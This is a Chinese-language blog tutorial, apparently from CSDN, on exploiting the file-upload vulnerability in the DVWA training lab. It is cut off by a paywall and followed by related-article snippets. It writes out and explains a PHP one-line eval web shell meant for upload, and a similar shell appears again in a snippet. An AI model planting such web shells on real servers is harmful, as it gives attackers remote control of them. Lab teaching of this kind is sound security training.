dvwa中的文件上传漏洞

原创 已于 2023-01-17 09:17:22 修改 · 1w 阅读 · 179 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #dvwa #文件上传漏洞

于 2023-01-12 14:28:09 首次发布
文章详细介绍了文件上传漏洞的概念、原理以及在DVWA(DamnVulnerableWebApplication)平台上的演示。通过低、中、高三种安全模式展示了如何上传木马文件,并利用BurpSuite进行类型绕过和00截断。此外,还提到了隐藏木马在图片中以及使用msfvenom生成PHP代码的图片木马等高级绕过技巧。

环境:

Metasploitable2: 192.168.11.157 dvwa版本:Version 1.0.7 (Release date: 08/09/10)

kail机器:192.168.11.156

一、什么是文件上传漏洞?

  1. 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等。正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回;

  1. 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网;

上传漏洞原理图:

文件上传漏洞,通常是由于对上传文件的类型、内容没进行严格的审查、过滤,使得攻击者可以通过上传木马获取服务器的webshell权限。

入侵条件:

  1. 木马上传成功

  1. 知道木马的路径

  1. 木马能够正常运行

二、演示dvwa上的文件上传漏洞

2.1、编辑一句话木马

pass.php文件添加 

<?php @eval($_POST['pass']);?>

  • @表示后面即使执行错误,也不报错。

  • eval()函数表示括号内的语句字符串什么的全都当做代码执行。

  • $_POST['pass']表示从页面中获得pass这个参数值。

2.2、低安全模式

low级别未对上传的文件进行任何验证,可以上传任意类型的文件

最低0.47元/天 解锁文章
DVWA靶场系列(四)—— File Upload(文件上传
qq_45612828的博客
07-12 6349
DVWA靶场系列(四)—— File Upload(文件上传
DVWA File Upload 漏洞实战指南】(Low / Medium / High 全级别解析)
weixin_40433003的博客
04-18 1387
文件上传功能是 Web 应用中非常常见的一种功能,用于上传头像、文档、图片等文件。但如果验证不当,攻击者可能上传恶意脚本,进而控制服务器。在 DVWA 中,模块专门设计用于演练此类漏洞的不同防御等级。打开FileUpload的时候看到有红色的报错信息如图所示:报错一:Incorrect folder permissions: /var/www/html/dvwa/hackable/uploads/Folder is not writable.文件夹权限不正确:文件夹不可写。
DVWA靶场之五:上传文件漏洞(File Upload)
最新发布
YoungLime的博客
10-04 769
上传文件漏洞(File Upload Vulnerability)是指 Web 应用允许用户上传文件,但没有对上传的文件进行严格的验证和限制,导致攻击者可以上传恶意文件(通常是脚本或可执行代码),并在服务器上执行。原理可能的危害。
5、DVWA——文件上传
qq_55202378的博客
09-11 1527
DVWA 文件上传
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4762
DVWA文件上传
DVWA文件上传漏洞之High渗透测试
Xlucas的博客
08-11 954
DVWA文件上传漏洞之High的渗透测试
DVWA文件上传漏洞(high)
感谢关注
12-16 868
2.在放该图片的目录里面打开。1.随机创建一个图片,命名为。,再借用蚁剑即可破解。
DVWA系列---File Upload 文件上传漏洞
野原新之助
01-27 676
文章目录一、前言二、Low级别1、演示三、Medium级别四、High级别 一、前言 文件上传漏洞是指: 服务器对用户上传的文件没有进行严格过滤,导致用户上传了一些危险文件(如一句话木马的php文件),然后访问这些危险文件,对服务器造成控制或破坏。 预防方法: 1、对用户可上传的文件类型及进行严格控制,设置白名单,防止用户上传危险文件; 2、对上传的文件进行文件名转换,防止用户直接访问到上传的文件...
DVWA文件上传漏洞
sunshine1_0的博客
01-20 2207
文件上传漏洞 低级别 中等级别 高级别
dvwa文件上传漏洞】--文件上传漏洞总结
m0_63241485的博客
08-30 4476
文件上传漏洞--dvwa
DVWA 文件上传漏洞
QYbkx974的博客
11-16 1705
本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞
DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
weixin_60838266的博客
07-21 5392
DVWA靶场漏洞复现之文件上传+文件包含。
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 2428
当然了,代码还有很多种写法,这只是比较简单的一种,一些特殊情况下还要使用别的写法。
Dvwa文件上传漏洞
JBlock的博客
11-16 4319
今天到了比较有意思的地方,一句话我们要传木马啦!这个就比较有意思了,毕竟我们查找漏洞最想要的效果之一就是传马成功,获得我们想要的权限。 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 因为我用的web容器是Apache,所以暂且只介绍Apache的文件解析漏洞。 比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,A
DVWA文件上传漏洞
极光时流
03-31 765
Low 没有进行任何过滤 首相,上传一个phpinfo.php,其内代码如下: <?php phpinfo(); ?> 上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php 然后访问 首先,写好 说明存在上传和执行漏洞 上传一句话木马: <?php @eval($_POST[“hack”]); ?>...
DVWA~文件上传漏洞
里丘~班诺的小屋
05-09 1278
靶机介绍 实验原理 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 SQL注入攻击的对象是数据库服务,文件上传漏洞
DVWA-File Upload/文件上传漏洞
jammny
11-22 1487
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
dvwa文件上传漏洞防御
07-13
中的文件上传漏洞防御通常涉及以下几个方面: 1. **验证用户输入**:服务器需要检查上传文件的类型、大小、名称等是否符合预设规则,防止恶意文件上传如PHP脚本、SQL注入文件等。 2. **限制上传路径**:限制用户...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值